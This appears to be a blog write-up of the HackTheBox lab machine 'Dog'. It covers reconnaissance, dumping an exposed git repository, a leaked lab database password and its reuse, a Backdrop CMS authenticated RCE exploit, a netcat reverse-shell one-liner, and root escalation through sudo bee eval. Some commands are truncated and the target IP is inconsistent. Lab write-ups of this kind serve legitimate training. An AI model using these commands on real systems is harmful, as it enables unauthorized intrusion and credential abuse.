RobeeDS Logo

robeeds

Cybersecurity,  HackTheBox,  Privilege Escalation,  Linux

HackTheBox | Dog [Easy] Writeup

Author

robeeds

Date Published

Machine Information

IP Address: 10.10.11.58


Guide

Update hosts file

1vim /etc/hosts


Run Nmap Scan (Quick)

1sudo nmap -sS -sV 10.10.11.68 -stats-every=5s

Results


Visit Webpage

Run Ffuf to view directories

1ffuf -w /usr/share/wordlists/common.txt:FUZZ -u http://dog.htb/FUZZ -ic

Results

There is an exposed Git Repository. This means that we will be able to view the site's history and development. Reference


Download Git-Dumper

1pipx install git-dumper

Run Git-Dumper on Dog

1git-dumper http://dog.htb/ git_dump

Cd into git_dump folder

1cd git_dump

Listing current directory


There is a settings.php file, view contents

Here we have some credentials to the root user of the MySQL server. 

1root:BackDropJ2024DS2024

Let's check the Git logs

1git log

Git checkout using the id.

Now, let's do a quick scan of any files that contain account information with the domain 'dog.htb'

We have more usernames and email accounts we could possibly use to log into the website.

Trying Tiffany's email and the MySQL password lets us log into the dashboard

Checking User Accounts page

Take a mental note of this for later. Continuing to look around for any important information

Let's see if there are any exploits we can run on this. 

1searchsploit backdrop

Let's go ahead and gather some more information about the exploit version that matches with the machine's Backdrop instance.


Remote Code Execution

After some light research, I came across this.

Summary of how this exploit works: An authenticated user that has permissions to upload modules manually can maliciously upload PHP code to establish a reverse shell, ultimately leading up to remote code execution.

We already have authenticated ourselves as Tiffany, and looking around further, there is a module upload page.

Before we continue, let's create our first attempt at exploiting this box.

Copy the Backdrop 1.27.1 Authenticated RCE exploit

1cp /usr/share/exploitdb/exploits/php/webapps/52021.py .

Run the Python script

1python 52021.py http://dog.

The module was saved as a zip file, but we saw earlier that there wasn't a zip file extension installed. Let's see what file extensions are allowed.

From the browser, click on Manual Installation > Upload a module, theme, or layout archive to install.

It seems that tar, tgz, gz, and bz2 files are allowed. Let's go ahead and recompress the module to be uploaded. There will be a shell folder we will compress with the tar format. 

1tar -cf exploit.tar shell

Now, let's upload this file to the site, and visit its link.

We have a reverse shell from the browser, but I'd like to make this a bit more stable. Let's open a listening port with netcat. In another terminal tab,

1nc -lvnp 6666

And in our "shell" in the browser,

1python3 -c 'import os; os.system("rm -f /tmp/f;mknod /tmp/f p; cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_IP_HERE> 6666 >/tmp/f")'

This shell is still unstable, so let's go ahead and make our terminal experience more tolerable. Reference

Spawn a bash shell through Python

1python3 -c 'import pty; pty.spawn("/bin/bash")'

Set this to the background (Ctrl+z), then 

1stty raw -echo; fg

Lastly, set the $TERM variable to xterm

1export TERM=x

Now, we can see our pwd, clear our terminal, and use arrow keys.


One thing I like to do is to check the home directory

1ls -la /home

There are two users, jobert and johncusack. Listing their directories shows me that user.txt exists under johncusack, but I can't seem to view the majority of files with cat.


Getting Stuck

I did some thorough investigation all around the file system, seeing if there was anything of use. I found that there was a utility called "Bee" under the root directory '/' (note that this is different compared to '/root'. Usage of Bee could be found here. I honestly got stuck here, running linpeas and continuing to look around for any ways to escalate my privileges. My last choice was just to reuse the MySQL password from earlier on some more of the accounts, which was successful.


Getting the User Flag

I SSH'ed into johncusack's account. 

1ssh johncusack@dog.htb

Now, we're able to view the User flag. 

1cat user.txt

Run sudo -l to view permissions

1sudo -l

Re-enter the MySQL password, and we see the following

We see that johncusack has the permission to run the Bee command as sudo, without a password. Having previously viewed its usage, can actually use this to spawn a shell as root. 

1sudo bee --root=/var/www/html eval 'system("/bin/bash");'

Now, we can view the directory and see the contents of root.txt

1cat /root/root.txt